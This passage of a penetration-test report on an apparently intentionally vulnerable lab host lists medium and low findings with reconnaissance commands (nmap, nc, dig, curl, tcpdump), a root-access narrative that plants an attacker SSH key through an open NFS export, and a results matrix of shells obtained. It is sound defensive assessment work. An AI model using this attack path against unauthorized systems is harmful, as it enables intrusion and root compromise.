Impact. Exposure to relay/MITM and protocol-level attacks.

Mitigation.

  • Disable SMBv1 (server min protocol = SMB2_10 or higher).
  • Enforce SMB signing; require authentication; segment SMB traffic.

M3 — Legacy / Cleartext FTP Daemons

  • Affected component: vsftpd (TCP 21), ProFTPD (TCP 2121)
  • Severity: Medium — CVSS 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)

Description. Two outdated FTP daemons are network-reachable pre-authentication. FTP transmits credentials and data in cleartext and these specific builds are end-of-life (and, for vsftpd 2.3.4, backdoored — see C1). Exposed legacy FTP both leaks credentials in transit and widens the attack surface.

Proof of Concept.

$ nc 192.168.229.132 21    => 220 (vsFTPd 2.3.4)
$ nc 192.168.229.132 2121  => 220 ProFTPD 1.3.1 Server ...
# Both pre-auth reachable; FTP AUTH is cleartext on the wire.

Impact. Credential interception and exposure to service-specific CVEs (C1, H6).

Mitigation.

  • Replace FTP with SFTP (over SSH) or enforce FTPS (TLS).
  • Decommission unused daemons; disable anonymous access; restrict to trusted hosts.

M4 — OpenSSH 4.7p1 / Debian Predictable-PRNG Era (CVE-2008-0166)

  • Affected component: OpenSSH 4.7p1 Debian, TCP 22
  • Severity: Medium — CVSS 5.6 (AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N)

Description. This OpenSSH build dates from the Debian/Ubuntu OpenSSL weak-PRNG window (CVE-2008-0166), during which the random-number generator produced only ~32,767 distinct values. Any SSH host or user keys generated on an affected system in that period are drawn from a small, pre-computable set and can be brute-forced offline, enabling key-based authentication bypass or host-key impersonation.

Proof of Concept.

$ nmap -p22 -sV 192.168.229.132
=> OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
# Any keys generated in the vulnerable window are in the public weak-key sets
# (e.g. g0tmi1k / Debian OpenSSL blacklists) → offline key recovery.

Impact. Potential authentication bypass via brute-forced weak keys; host-key spoofing for MITM.

Mitigation.

  • Regenerate all SSH host and user keys on a patched system; revoke old keys.
  • Upgrade OpenSSH/OpenSSL to current releases; enforce strong key types (ed25519) and disable weak algorithms.

M5 — Cleartext Protocols In Use

  • Affected component: Telnet (23), r-services (512–514), FTP (21/2121), HTTP (80), VNC (5900)
  • Severity: Medium — CVSS 5.9 (AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N)

Description. Multiple services transmit credentials and session data without encryption. An attacker positioned on the network path (ARP spoofing, rogue switch port, span) can passively capture login credentials, session cookies, and command output, then replay or reuse them. This compounds every credential-based finding (H1, H2).

Proof of Concept.

# On-path capture (illustrative)
$ tcpdump -i ens33 -A 'tcp port 23 or tcp port 21'
# Telnet/FTP USER/PASS appear in plaintext within the captured stream.

Impact. Credential theft and session hijacking by any on-path adversary.

Mitigation.

  • Eliminate cleartext services: replace Telnet/r-services with SSH, FTP with SFTP/FTPS, HTTP with HTTPS, and tunnel VNC over SSH/VPN.
  • Enforce network segmentation and switch-port security (DAI, port security) to limit on-path positioning.

M6 — DNS Open Recursive Resolver (BIND 9.4.2)

  • Affected component: ISC BIND 9.4.2, UDP 53
  • Severity: Medium — CVSS 6.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

Description. The DNS server performs recursion for arbitrary external clients. Open recursive resolvers are abused as DDoS amplification/reflection vectors (small spoofed query → large response sent to a victim) and the EOL BIND 9.4.2 is additionally exposed to cache-poisoning weaknesses of the Kaminsky era (CVE-2008-1447).

Proof of Concept.

$ dig @192.168.229.132 google.com A +short
=> returns recursively resolved answers   (recursion available for any client)
$ nmap -sU -p53 --script dns-recursion 192.168.229.132
=> Recursion appears to be enabled

Impact. Participation in DDoS amplification attacks against third parties; cache-poisoning / response-spoofing exposure for local clients.

Mitigation.

  • Disable open recursion: recursion no; for public-facing roles, or restrict with allow-recursion { trusted; };.
  • Upgrade BIND to a supported release; enable response-rate-limiting (RRL) and source-port/QID randomization (DNS cookies / DNSSEC validation).

LOW / INFORMATIONAL

L1 — End-of-Life Operating System

  • Component: Ubuntu 8.04 LTS, Linux kernel 2.6.24 (i686)
  • Severity: Low/Info (systemic — elevates every other finding)

Description. The OS and kernel receive no security updates. Numerous local privilege-escalation exploits apply (e.g. udev CVE-2009-1185, sock_sendpage CVE-2009-2692), so any low-privileged code-execution foothold becomes root.

PoC. uname -aLinux metasploitable 2.6.24-16-server i686 (matches known local-root exploit targets).

Mitigation. Rebuild on a current, supported, patched OS; establish a patch- management cycle.

L2 — phpinfo.php Exposed

  • Component: Apache (TCP 80), /phpinfo.php
  • Severity: Low/Info

Description. A phpinfo() page is publicly reachable, disclosing absolute paths, loaded modules, environment variables, and PHP configuration — valuable reconnaissance for an attacker.

PoC. curl http://192.168.229.132/phpinfo.php → full PHP configuration page.

Mitigation. Remove phpinfo.php and any diagnostic scripts from web roots.

L3 — Verbose Version Banners

  • Component: FTP / SSH / SMTP / HTTP / SMB
  • Severity: Low/Info

Description. Services advertise exact product and version strings, letting attackers map directly to known CVEs without active probing.

PoC. nmap -sV 192.168.229.132 returns precise versions for every service.

Mitigation. Suppress/obfuscate banners where supported (ServerTokens Prod, ServerSignature Off, Postfix smtpd_banner, etc.). Note this is defense-in-depth, not a fix for the underlying versions.

L4 — Default/Test Directories Present

  • Component: Apache (TCP 80), /test/, /cgi-bin/
  • Severity: Low/Info

Description. Leftover default and test directories expand the attack surface and may host scripts with their own weaknesses.

PoC. curl -I http://192.168.229.132/test/ → 200/403 indicating presence.

Mitigation. Remove unused directories and sample/CGI scripts; serve only required content.

L5 — HTTP TRACE / WebDAV Verbs Enabled

  • Component: Apache (TCP 80)
  • Severity: Low/Info

Description. Non-standard HTTP methods (TRACE, and WebDAV PUT/DELETE/ MOVE) are enabled site-wide. TRACE can aid cross-site tracing; the write verbs are the basis of the C10 RCE.

PoC. curl -X OPTIONS -i http://192.168.229.132/Allow: header lists PUT,DELETE,MOVE,TRACE.

Mitigation. Disable TRACE (TraceEnable Off) and restrict/disable WebDAV write methods except where explicitly required and authenticated.

L6 — AJP13 Connector Exposed (TCP 8009)

  • Component: Apache Tomcat AJP connector
  • Severity: Low/Info

Description. The AJP13 binary connector is reachable on the network. The well-known Ghostcat vulnerability (CVE-2020-1938) affects Tomcat 6/7/8/9 and does not apply to this Tomcat 5.5-era Coyote 1.1 connector; however, an exposed AJP connector is an internal-by-design interface that should not face untrusted networks (generic request-injection/SSRF-style risk).

PoC. Port 8009 open and speaking AJP13 (nmap -p8009 -sV).

Mitigation. Bind AJP to localhost, or firewall 8009; set a secret on the connector; disable it if the reverse-proxy fronting is not used.

L7 — X11 Server Exposed but Access-Controlled

  • Component: X11 (TCP 6000)
  • Severity: Low/Info

Description. An X11 server listens on the network. Access to display :0 was tested and denied (host-based access control is active), so screen capture / keystroke injection is not currently possible. The exposed TCP listener remains a latent risk should xhost + ever be set.

PoC. xdpyinfo -display 192.168.229.132:0No protocol specified / access denied (verified — not openly accessible).

Mitigation. Start X with -nolisten tcp; keep host-based access control; never run xhost +.

L8 — UDP Attack Surface (Coverage Confirmation)

  • Component: Full UDP range (nmap -sU -p-)
  • Severity: Low/Info

Description. A full privileged UDP sweep was completed for assurance. Aside from the DNS open resolver (M6) and the NFS/RPC sidecar daemons (covered under C8), no additional exploitable UDP service was found. 161/udp (SNMP) and 69/udp (TFTP) are closed. This item documents coverage completeness.

PoC. echo hacker | sudo -S nmap -sU -p- --min-rate 5000 192.168.229.132 → 7 ports open, all accounted for in §4.2.

Mitigation. Informational — maintain default-deny UDP firewalling for any non-essential service.

7. Attack Narrative

From an unauthenticated position on the network segment, root was achieved in seconds. Any single one of C1–C4, C7, C8, or C9 yields immediate unauthenticated root with no chaining.

A representative low-noise path: mount the wide-open NFS export (C8), append an attacker public key to /root/.ssh/authorized_keys, and log in cleanly over SSH as root — generating minimal service-log noise.

The two criticals that resisted the textbook approach were also driven to live code execution: C7 (Java RMI) produced a root Meterpreter session, and C6 (Ruby DRb) required defeating Ruby's $SAFE taint sandbox by pivoting to a raw Kernel#syscall primitive — proving the sandbox is not a security boundary. All 13 critical paths are therefore demonstrated, not theoretical.

The presence of the 1524 root bindshell (C4) indicates the host has already been backdoored by a third party and should be treated as an active incident.

8. Strategic Remediation Roadmap

Immediate (0–24h)

  1. Isolate the host from the network. It is EOL and backdoored; assume full compromise.
  2. Treat as an incident — the 1524 bindshell (C4) is a compromise indicator; preserve evidence, then rebuild.

Short term (rebuild) 3. Rebuild on a supported, patched OS with a minimal service footprint. 4. Remove trojaned packages (vsftpd 2.3.4, UnrealIRCd 3.2.8.1). 5. Disable r-services, Telnet, distccd, DRb, Java RMI remote class loading, X11/TCP, and AJP exposure. 6. NFS: drop the * wildcard, enforce root_squash, scope exports to specific hosts. 7. Set strong unique credentials for MySQL, PostgreSQL, VNC, and Tomcat Manager (or disable the Manager). 8. Disable SMBv1; require authenticated, signed SMB.

Hardening (baseline) 9. Remove all training/demo web apps (DVWA, Mutillidae, TikiWiki, TWiki, phpMyAdmin, phpinfo). 10. Enforce SSH key authentication; regenerate keys; disable passwords and weak algorithms. 11. Disable DNS open recursion; upgrade/replace BIND; enable RRL. 12. Implement host-based firewalling (default-deny), centralized logging, and file-integrity monitoring.

9. Appendix A — Per-Port Verification Matrix

PortFindingStatus
21 vsftpd 2.3.4C1 backdoorOpen — uid=0 on :6200
22 sshH2 msfadmin:msfadminOpen — medusa SUCCESS
23 telnetH2 / M5 cleartext + credsOpen open + creds valid
25 smtpM1 VRFY enumOpen — root/msfadmin (252)
80 httpH3/H4/L2/L5 apps, C10 WebDAV RCEC10 Open — www-data
111/2049/mountdC8 NFS no_root_squashOpen — RW via nfs-statfs
139/445 sambaC3 usermap_script / H5 / M2C3 Open — root callback
512 rexecr-servicesopen; rejected empty auth
513/514 rlogin/rshC9 root trustOpen — uid=0 + shadow
1099 java-rmiC7 classloader RCEOpen — meterpreter root
1524 bindshellC4 root shellOpen — uid=0
2121 proftpd 1.3.1H6 mod_sql CVEs / M3version-Open
3306 mysqlC12 root:blankOpen — root@%
3632 distccdC5 CVE-2004-2687Open — uid=1 daemon
5432 postgresC13 postgres:postgresOpen — auth OK
5900 vncH1 weak passwordOpen — hydra
6000 X11L7 exposedaccess denied (verified)
6667/6697 unrealircdC2 backdoorOpen — uid=0
8009 ajp13L6 exposedGhostcat N/A this version
8180 tomcatC11 tomcat:tomcatOpen — mgr HTTP 200
8787 drbC6 DRb RCEOpen — $SAFE bypass via syscall
53/udpM6 open resolverOpen — BIND 9.4.2 recursion

Live-Open RCE/access: C1, C2, C3, C4, C5, C6, C7, C8, C9, C10, C11, C12, C13, H1, H2 — 15 paths, including all 13 criticals.

10. Appendix B — CVSS Vectors & References

IDCVE / ClassCVSS 3.1 VectorScore
C1CVE-2011-2523AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H10.0
C2CVE-2010-2075AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H10.0
C3CVE-2007-2447AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H10.0
C4Bindshell / persistenceAV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H10.0
C5CVE-2004-2687AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H9.8
C6DRb / $SAFE bypassAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H9.8
C7Java RMI classloaderAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H9.8
C8NFS no_root_squashAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H9.8
C9r-services trustAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H9.8
C10WebDAV PUT RCEAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H9.8
C11Tomcat default credsAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H9.8
C12MySQL blank rootAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L9.1
C13Postgres default credsAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L9.1
H1VNC weak passwordAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H8.8
H2Default OS credsAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L8.1
H3CVE-2007-5423 / CVE-2005-2877 + app flawsAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N8.0+
H4phpMyAdmin exposureAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N7.5
H5Anonymous SMBAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N7.5
H6CVE-2009-0542 / 0543AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N7.5
M1SMTP VRFY enumAV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N5.3
M2SMBv1AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N5.9
M3Legacy FTPAV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N5.3
M4CVE-2008-0166AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N5.6
M5Cleartext protocolsAV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N5.9
M6BIND open resolver / CVE-2008-1447AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H6.5

Engagement conduct. All testing was authorized and confined to the in-scope host. Proof-of-concept payloads were non-destructive; the single evidence artifact created (an empty marker file via C6) was deleted. No data was exfiltrated and no service was disrupted.

— End of report —

Details